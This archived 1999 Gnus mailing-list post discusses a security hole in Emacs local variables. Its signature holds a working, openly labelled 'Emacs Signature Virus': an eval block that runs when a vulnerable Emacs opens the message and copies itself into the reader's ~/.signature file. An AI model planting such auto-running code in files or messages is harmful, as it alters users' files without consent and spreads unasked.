From mboxrd@z Thu Jan 1 00:00:00 1970 X-Msuck: nntp://news.gmane.io/gmane.emacs.gnus.general/21859 Path: main.gmane.org!not-for-mail From: Per Abrahamsen Newsgroups: gmane.emacs.gnus.general Subject: Re: local variables and Gnus security Date: 10 Mar 1999 14:42:42 +0100 Organization: The Church of Emacs Sender: owner-ding@hpc.uh.edu Message-ID: References: NNTP-Posting-Host: coloc-standby.netfonds.no Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Trace: main.gmane.org 1035159886 25097 80.91.224.250 (21 Oct 2002 00:24:46 GMT) X-Complaints-To: usenet@main.gmane.org NNTP-Posting-Date: Mon, 21 Oct 2002 00:24:46 +0000 (UTC) Return-Path: Original-Received: from fisher.math.uh.edu (fisher.math.uh.edu [129.7.128.35]) by sclp3.sclp.com (8.8.5/8.8.5) with ESMTP id IAA14400 for ; Wed, 10 Mar 1999 08:45:37 -0500 (EST) Original-Received: from sina.hpc.uh.edu (lists@Sina.HPC.UH.EDU [129.7.3.5]) by fisher.math.uh.edu (8.9.1/8.9.1) with ESMTP id HAB04649; Wed, 10 Mar 1999 07:43:30 -0600 (CST) Original-Received: by sina.hpc.uh.edu (TLB v0.09a (1.20 tibbs 1996/10/09 22:03:07)); Wed, 10 Mar 1999 07:43:35 -0600 (CST) Original-Received: from sclp3.sclp.com (root@sclp3.sclp.com [204.252.123.139]) by sina.hpc.uh.edu (8.7.3/8.7.3) with ESMTP id HAA16126 for ; Wed, 10 Mar 1999 07:43:26 -0600 (CST) Original-Received: from sheridan.dina.kvl.dk (root@sheridan.dina.kvl.dk [130.225.40.227]) by sclp3.sclp.com (8.8.5/8.8.5) with ESMTP id IAA14356 for ; Wed, 10 Mar 1999 08:43:15 -0500 (EST) Original-Received: from my.dina.kvl.dk (my.dina.kvl.dk [130.225.40.137]) by sheridan.dina.kvl.dk (8.9.0.Beta5/8.9.0.Beta5) with SMTP id OAA31367; Wed, 10 Mar 1999 14:43:03 +0100 Original-Received: by my.dina.kvl.dk (SMI-8.6/SMI-SVR4) id OAA15537; Wed, 10 Mar 1999 14:42:42 +0100 Original-To: ding@gnus.org X-Face: +kRV2]2q}lixHkE{U)mY#+6]{AH=yN~S9@IFiOa@X6?GM|8MBp/ Original-Lines: 20 User-Agent: Gnus/5.070076 (Pterodactyl Gnus v0.76) Emacs/20.3 Precedence: list X-Majordomo: 1.94.jlt7 Xref: main.gmane.org gmane.emacs.gnus.general:21859 X-Report-Spam: http://spam.gmane.org/gmane.emacs.gnus.general:21859 Robert Epprecht writes: > This rises the question if this is not a problem for Gnus security. It is. Really old versions of GNUS and RMAIL had such a security hole, but it was closed long ago. Maybe there has been a regression. In any case, this gives me an excuse for dusting of my old signature. -- Consider adding "(setq inhibit-local-variables t)" to your ".emacs" file. Local Variables: eval: (save-excursion (goto-char (point-max)) (search-backward (concat "Consider " "adding")) (append-to-file (point) (point-max) "~/.signature") (message "The Emacs Signature Virus")) End: